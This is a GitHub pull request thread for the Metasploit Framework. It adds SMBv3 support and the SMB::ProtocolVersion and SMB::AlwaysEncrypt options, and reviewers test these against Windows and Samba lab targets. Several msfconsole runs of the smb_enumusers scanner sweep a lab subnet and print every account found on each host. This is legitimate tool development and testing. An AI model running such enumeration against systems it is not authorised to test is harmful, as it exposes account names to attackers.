SMBv3 integration with Framework #13417

cdelafuente-r7 · 2020-05-07T19:11:21Z

This adds SMBv3 support to Framework by including the latest changes to the ruby_smb library. ~~It depends on this PR to be merged.~~
EDIT: The ruby_smb PR is merged now.

This also adds two new options for the SMB client:

SMB::ProtocolVersion: One or a list of comma-separated SMB protocol versions to negotiate (e.g. "1" or "1,2" or "2,3,1")
SMB::AlwaysEncrypt: Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it

One of the biggest changes is that ruby_smb is now the default client, which means SMB versions 1, 2 and 3 are automatically negotiated, unless specified otherwise. Some modules still require Rex SMB client and were updated to force its use. As a consequence, these modules will only be able to use SMBv1.

Verification Steps

Windows target setup

SMB2 support from Windows Vista and Server 2008.
SMB3 support from Windows 8 and Windows Server 2012.
Best to test against multiple Windows supporting different SMB versions.
Note that encryption is only available with SMBv3.
Setup at least one share folder and give an administrator user full permissions (you can also restrict permissions for testing access control)

To get the current configuration state of the SMB server, run this in Powershell:

Get-SmbServerConfiguration

To disable SMBv1, run this in an elevated Powershell:

Set-SmbServerConfiguration -EnableSMB1Protocol $false

To disable SMBv2 and SMBv3 (it is not possible to disable one separately), run this in an elevated Powershell:

Set-SmbServerConfiguration -EnableSMB2Protocol $false

Change $false to $true to re-enable the protocol versions using the same Powershell command.

To require encryption on the server (SMB3), run this in an elevated Powershell:

C:\> Set-SmbServerConfiguration -EncryptData $true

To enable per-share encryption on the server (SMB3), run this in an elevated Powershell:

C:\ Set-SmbServerConfiguration -EncryptData $false
C:\ Set-SmbShare -Name <share name> -EncryptData 1

Samba target setup

The easiest way is to use docker and dperson/samba.
The following command will create and start a container running on ports 139 and 445, with user smbuser (password 123456) and with a share called home (sharing local path /share). Note that -S will disable SMB2 minimum version, which means SMB1 will be available. Remove it if you don't want SMB1 support.

docker run --name samba_container --rm -it -p 139:139 -p 445:445 -d dperson/samba -p -u 'smbuser;123456' -s 'home;/share' -S

Monitoring setup

I recommend using Wireshark filtering port 139 and 445 with displaying only SMB packets:

Capture filter: tcp port 445 || tcp port 139
Display filter: smb||smb2

Also, open a separate terminal to check the logs:

tail -f ~/.msf4/logs/framework.log

Tests

Example with modules/auxiliary/scanner/smb/smb_enumusers module.

msf5 > use modules/auxiliary/scanner/smb/smb_enumusers
msf5 auxiliary(scanner/smb/smb_enumusers) > set SMBUser smbtest
SMBUser => smbtest
msf5 auxiliary(scanner/smb/smb_enumusers) > set SMBPass 123456
SMBPass => 123456
msf5 auxiliary(scanner/smb/smb_enumusers) > set verbose true
verbose => true
msf5 auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 172.16.60.218
RHOSTS => 172.16.60.218
msf5 auxiliary(scanner/smb/smb_enumusers) > show options

Module options (auxiliary/scanner/smb/smb_enumusers):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DB_ALL_USERS  false            no        Add all enumerated usernames to the database
   RHOSTS        172.16.60.218    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain     .                no        The Windows domain to use for authentication
   SMBPass       123456           no        The password for the specified username
   SMBUser       smbtest          no        The username to authenticate as
   THREADS       1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 172.16.60.218:445     - WIN-POFO2P6ER44 [ Administrator, DefaultAccount, Guest, user11, smbtest, sqltest ] ( LockoutTries=0 PasswordMin=0 )
[*] 172.16.60.218:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Verify the SMB version that has been negotiated in the logs:

[05/29/2020 12:25:00] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[05/29/2020 12:25:00] [d(0)] core: Negotiated SMB version: SMB3

In this case, the client asked for version 1, 2 or 3 and the server picked SMBv3. The communication should be encrypted by default. You can verify this in a Wireshark:

No.	Time	Stream	Source	Src port	Destination	Dst port	Protocol	Length	Info	SMB dialect
38	95.942267	3	172.16.60.1	65451	172.16.60.218	445	SMB	139	Negotiate Protocol Request	NT LM 0.12,SMB 2.002,SMB 2.???
39	95.942637	3	172.16.60.218	445	172.16.60.1	65451	SMB2	240	Negotiate Protocol Response	SMB2 wildcard
41	95.951575	3	172.16.60.1	65451	172.16.60.218	445	SMB2	270	Negotiate Protocol Request	SMB 2.0.2,SMB 2.1,SMB 3.0,SMB 3.0.2,SMB 3.1.1
42	95.951969	3	172.16.60.218	445	172.16.60.1	65451	SMB2	306	Negotiate Protocol Response	SMB 3.1.1
44	95.957149	3	172.16.60.1	65451	172.16.60.218	445	SMB2	236	Session Setup Request, NTLMSSP_NEGOTIATE	
45	95.957496	3	172.16.60.218	445	172.16.60.1	65451	SMB2	413	Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE	
47	95.960708	3	172.16.60.1	65451	172.16.60.218	445	SMB2	516	Session Setup Request, NTLMSSP_AUTH, User: .\smbtest	
49	95.977647	3	172.16.60.218	445	172.16.60.1	65451	SMB2	151	Session Setup Response	
51	95.982281	3	172.16.60.1	65451	172.16.60.218	445	SMB2	234	Encrypted SMB3	
52	95.986995	3	172.16.60.218	445	172.16.60.1	65451	SMB2	202	Encrypted SMB3	
54	95.993498	3	172.16.60.1	65451	172.16.60.218	445	SMB2	254	Encrypted SMB3	
55	95.999835	3	172.16.60.218	445	172.16.60.1	65451	SMB2	274	Encrypted SMB3	
...

Note that encryption should occur only after the session setup.

You can test the two new options (when available):

Test SMBv1 only:

msf5 auxiliary(scanner/smb/smb_enumusers) > set SMB::ProtocolVersion 1

Verify the log shows the correct version:

[05/29/2020 12:32:14] [d(0)] core: SMB version(s) to negotiate: [1]
[05/29/2020 12:32:14] [d(0)] core: Negotiated SMB version: SMB1

Verify the packet capture shows only SMB1 packets.

Test SMBv1 and SMBv2:

msf5 auxiliary(scanner/smb/smb_enumusers) > set SMB::ProtocolVersion 1,2

Verify the log shows the correct version:

[05/29/2020 12:36:02] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[05/29/2020 12:36:02] [d(0)] core: Negotiated SMB version: SMB2

Verify the packet capture shows only SMB2 packets.
Disable SMB2 (see Windows target setup) and re-run the test.

Verify the log shows the correct version:

[05/29/2020 12:38:02] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[05/29/2020 12:38:02] [d(0)] core: Negotiated SMB version: SMB1

Verify the packet capture shows only SMB1 packets.
Try other combinations

Test SMB3 without encryption (SMB3 and encryption should be enabled on the server):

msf5 auxiliary(scanner/smb/smb_enumusers) > set SMB::ProtocolVersion 1,2,3
SMB::ProtocolVersion => 1,2,3
msf5 auxiliary(scanner/smb/smb_enumusers) > set SMB::AlwaysEncrypt false
SMB::AlwaysEncrypt => false

Verify the SMB version that has been negotiated in the logs:

[05/29/2020 12:25:00] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[05/29/2020 12:25:00] [d(0)] core: Negotiated SMB version: SMB3

Verify the packet capture shows only SMB3 packets without encryption.

jmartin-tech · 2020-05-08T14:48:33Z

@msjenkins-r7 test this please.

jmartin-tech · 2020-05-08T16:24:10Z

@msjenkins-r7 test this please.

smcintyre-r7 · 2020-05-28T15:28:19Z

@cdelafuente-r7 would you be able to please rebase / retarget this for merging into the 6.x branch rather than master?

cdelafuente-r7 · 2020-05-28T17:24:49Z

Sure! I retargeted the PR. Thanks!

smcintyre-r7

Changes look good, I'll move on to testing as many of the modules as I can.

smcintyre-r7 · 2020-06-08T14:00:24Z

lib/msf/core/exploit/smb/client.rb

@@ -144,17 +165,23 @@ def smb_login(simple_client = self.simple)
          datastore['SMB::Native_LM'],
          {:use_spn => datastore['NTLM::SendSPN'], :name =>  self.rhost}
        )
+        # XXX: Any reason to connect to the IPC$ share in this method?


I'm guessing it has to do with:

When the named pipe is being created, the process specifies the security that is associated with the pipe, and then makes sure that access is only granted to the specified users or groups.

See: IPC Share and Null Session Behavior in Windows

IIRC, $IPC is just a special share that enables named pipe connections to the server. It should only be necessary when a named pipe is needed (e.g. DCERPC requests). Security is set on the named pipe and not on the $IPC share.

I noticed that when a module needs to connect to a named pipe, it usually connects to the $IPC share right after smb_login, which creates a duplicate connection to $IPC. This first connection to $IPC is never closed.

After think about it, it might be some kind of "keep-alive" trick. Having an active connection to the $IPC share maybe help to avoid a server timeout if the SMB session is not used. I will need to run some tests.

I tested against different Windows version (2008R2, 2012, 2016 and 2019) and the behavior remains the same regarding this connection to $IPC share is established or not: after the session is setup, the server sends a TCP keepalive packets every 2 minutes and RST after 7 attempts.

I would be inclined to remove it.

lib/rex/proto/smb/simpleclient/open_pipe.rb

modules/auxiliary/admin/smb/check_dir_file.rb

modules/auxiliary/scanner/smb/smb_enumshares.rb

- multiple protocol version negotiation - SMB 1, 2 and 3 by default - add SMB::ProtocolVersion option to SMB Client mixin

- Add SMB::AlwaysEncrypt option - Force SMB1 for SMB fingerprint - Update smb_netshareenumall

- smb_ms17_010.rb - psexec_ms17_010.rb - psexec_psh.rb - smb_enumshares.rb

- modules/auxiliary/scanner/smb/smb_enumshares.rb - modules/exploits/linux/samba/setinfopolicy_heap.rb - modules/exploits/linux/samba/trans2open.rb - modules/exploits/multi/samba/usermap_script.rb - modules/exploits/windows/smb/ipass_pipe_exec.rb

- ms17_010_command and ms17_010_psexec: deregister SMB::ProtocolVersion option - client: update error handling - is_known_pipename: force SMB1 only for #enumerate_directories and update error handling

bwatters-r7 · 2020-06-10T21:31:36Z

That error on Windows 8.1x86 is consistent.....

msf5 auxiliary(scanner/smb/smb_enumusers) > set rhost 192.168.134.171
rhost => 192.168.134.171
msf5 auxiliary(scanner/smb/smb_enumusers) > run

Error: 192.168.134.171 RubySMB::Error::CommunicationError An error occurred reading from the Socket Connection reset by peer
[*] 192.168.134.171:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) >

bwatters-r7 · 2020-06-10T22:13:55Z

When I drop the SMB version to [1,2], I get a response from the Windows 8.1 x86 machines:

msf5 auxiliary(scanner/smb/smb_enumusers) > set SMB::ProtocolVersion 1,2
SMB::ProtocolVersion => 1,2
msf5 auxiliary(scanner/smb/smb_enumusers) > run

[*] 192.168.134.0/24:     - Scanned  29 of 256 hosts (11% complete)
[*] 192.168.134.0/24:     - Scanned  52 of 256 hosts (20% complete)
[*] 192.168.134.0/24:     - Scanned  77 of 256 hosts (30% complete)
[+] 192.168.134.106:445   - WIN1803X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.104:445   - WIN2019X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.111:445   - WIN10X86_1709 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.109:445   - WIN2016X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 104 of 256 hosts (40% complete)
[+] 192.168.134.114:445   - WIN10X86_1703 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, defaultuser0, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.115:445   - WIN1709X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.119:445   - WIN10X86_1803 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.117:445   - WIN10X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.118:445   - WIN10X64_1703 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, defaultuser0, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.121:445   - WIN10X64_1511 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.123:445   - WIN8X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 129 of 256 hosts (50% complete)
[+] 192.168.134.132:445   - WIN10X64_1709 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.129:445   - WIN10X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.146:445   - WIN1809X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.151:445   - WIN2012X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.149:445   - WIN10X64_1607 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.156:445   - WIN81X64SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 154 of 256 hosts (60% complete)
[+] 192.168.134.164:445   - WIN10X64_1809 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.162:445   - WIN81X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.172:445   - WIN2012R2X64SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.171:445   - WIN81X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.177:445   - WIN10X64_1803 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.189:445   - WIN81X86SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.185:445   - WIN8X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.187:445   - WIN2012R2X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.191:445   - WIN10X86_1809 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.193:445   - WIN10X86_1511 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.192:445   - WIN10X86_1607 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 187 of 256 hosts (73% complete)
[*] 192.168.134.0/24:     - Scanned 205 of 256 hosts (80% complete)
[*] 192.168.134.0/24:     - Scanned 232 of 256 hosts (90% complete)
[*] 192.168.134.0/24:     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) >

Logs:

[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:17] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:58] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:58] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:58] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:58] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:58] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:58] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:19] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:39] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:39] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:40] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:40] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:40] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:40] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:01] [d(0)] core: Negotiated SMB version: SMB2

cdelafuente-r7 · 2020-06-12T09:02:34Z

That error on Windows 8.1x86 is consistent.....

I could successfully reproduce this with an out-of-the-box Windows 8.1 (x86). My first assumption was that SMB3 dialects < 3.1.1 don't support session encryption and only per-share encryption as described here. However, after updating the OS (Windows Update), it appears to work properly.

I read the protocol again and found out my assumption was wrong, 3.0.0 and 3.0.2 dialects also support session and per-share encryptions, like 3.1.1.

So, out-of-the-box Windows 8 does not comply with the protocol. Actually, without updating the OS, SMB3 does not work properly in the first place. Do you mind trying again with an updated Windows 8, if possible?

bwatters-r7 · 2020-06-12T16:36:28Z

Yup..... after update, all targets respond

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[*] 192.168.134.0/24:     - Scanned  28 of 256 hosts (10% complete)
[*] 192.168.134.0/24:     - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.134.0/24:     - Scanned  77 of 256 hosts (30% complete)
[+] 192.168.134.104:445   - WIN2019X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
